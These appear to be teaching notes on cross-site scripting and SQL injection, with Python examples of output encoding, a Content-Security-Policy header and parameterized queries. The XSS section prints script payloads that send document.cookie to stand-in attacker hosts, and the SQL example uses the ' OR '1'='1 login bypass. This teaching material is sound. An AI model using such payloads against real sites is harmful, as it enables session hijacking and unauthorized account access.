XSS and SQL injection
Ungraded Quiz
- use an example to explain how a stored XSS attack works
- use an example to explain how a SQL injection attack works
Key concepts
XSS: cross-site scripting
- injecting malicious scripts into HTML tags or web pages; when the browser renders the HTML, the injected script is executed
- stored/persistent XSS:
  Here is a picture of my dog <img id="mydogpic" src="dog.jpg"> <script>document.getElementById("mydogpic").src="http://badsite.com/dog.jpg?arg1=" + document.cookie </script>
- websites must sanitize input!
- reflected (non-persistent) XSS:
  Our favorite site for deals is www.good.com: <a href='http://www.good.com/ <script>document.location="http://bad.com/dog.jpg?arg1="+document.cookie; </script>'> Click here </a>
- takes advantage of a site whose 404 error page echoes the requested path back into the response:
  File-not-found: filepath-requested
- DOM-based XSS
  - see DOM-based XSS
- for another source on XSS attacks, see types of cross-site scripting
- XSS impacts
  - once you allow an attacker to inject JavaScript, they can do a lot:
    - browser redirection
    - access cookies
    - access browser-stored data for a website
    - rewrite the document being displayed
    - exploit browser vulnerabilities
- defenses
  - sanitize input by removing tags
  - Content Security Policy
    - server can specify which domains are allowed to execute scripts
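The two XSS defenses above, worked through as an added example (this code is not from the notes): the stored-XSS comment from earlier is output-encoded with Python's `html.escape` before being placed in the page, and a Content-Security-Policy header value is built that only permits scripts from the site's own origin plus explicitly named hosts. The comment wrapper, the `cdn.example.com` host and the check function are assumptions made for the illustration.

```python
import html

# Constructed sample input: the stored-XSS payload from the notes, as a site
# might receive it in a comment field.
STORED_PAYLOAD = ('Here is a picture of my dog <img id="mydogpic" src="dog.jpg"> '
                  '<script>document.getElementById("mydogpic").src='
                  '"http://badsite.com/dog.jpg?arg1=" + document.cookie </script>')


def render_comment(user_text):
    """Output-encode untrusted text before placing it in an HTML body.

    html.escape turns < > & " ' into entities, so the browser displays the
    characters literally instead of parsing a <script> element.
    """
    return '<div class="comment">' + html.escape(user_text, quote=True) + "</div>"


def contains_raw_tag(rendered, tag="script"):
    """Post-render check (hypothetical helper): does a live <tag ...> survive?"""
    return ("<" + tag) in rendered.lower()


def csp_header(script_hosts=()):
    """Build a Content-Security-Policy value.

    'self' limits scripts to the page's own origin; extra hosts are listed
    explicitly. Inline <script> blocks, which is what an injected payload
    is, are blocked because 'unsafe-inline' is not granted.
    """
    script_src = " ".join(("'self'",) + tuple(script_hosts))
    return "default-src 'self'; script-src " + script_src + "; object-src 'none'"


if __name__ == "__main__":
    page = render_comment(STORED_PAYLOAD)
    print(page)
    print("raw <script> present:", contains_raw_tag(page))
    print("Content-Security-Policy:", csp_header(["https://cdn.example.com"]))
```

Encoding on output is what stops the stored payload from running; the CSP header is defense in depth, so that an encoding mistake elsewhere still leaves an inline script unable to execute.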
SQL Injection
- why a vulnerability exists
  - databases store information in tables
  - scripts construct SQL queries
  - scripts use input from cookies, variables, users
- SQL injection
  - crafting input so that an attacker chooses the SQL command to be executed
  - impacts:
    - extraction
    - modification
    - unauthorized account access
    - denial of service
- see [Example, page]
- defenses
  - escaping problematic characters
  - denylists: filtering out denied commands
  - positive validation: only allowing certain commands
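The SQL injection vulnerability and the "escaping problematic characters" defense from the notes, side by side as an added example (not code from the notes), plus a parameterized query, which is the standard stronger form of the same defense. It uses Python's built-in `sqlite3` with a constructed in-memory `users` table; the usernames, passwords and the login functions are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """The vulnerable pattern: user input is pasted into the SQL text.

    A quote character in the input ends the string literal early, so the
    rest of the input is parsed as SQL and the attacker picks the command.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(query))


def escape_single_quotes(value):
    """Defense from the notes: escape problematic characters.

    In SQL a literal single quote inside a string is written as two single
    quotes, so doubling them keeps the whole input inside the literal.
    This only covers string contexts, which is why parameterization is
    preferred.
    """
    return value.replace("'", "''")


def login_escaped(conn, username, password):
    """Same query shape as above, with the inputs escaped first."""
    query = ("SELECT username FROM users WHERE username = '"
             + escape_single_quotes(username) + "' AND password = '"
             + escape_single_quotes(password) + "'")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, username, password):
    """Preferred defense: parameterized query.

    The SQL text is fixed; the driver passes the values separately as data,
    so they can never change the structure of the statement.
    """
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


# Constructed input: a stray quote closes the literal and the remainder is
# read as SQL by the concatenated version.
INJECTED = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("concatenated :", login_concatenated(conn, "nobody", INJECTED))
    print("escaped      :", login_escaped(conn, "nobody", INJECTED))
    print("parameterized:", login_parameterized(conn, "nobody", INJECTED))
```

With the same input, the concatenated query matches every row, while both the escaped and the parameterized versions match none; the parameterized form is the one to use, because it does not depend on the programmer remembering every character that is problematic in every context.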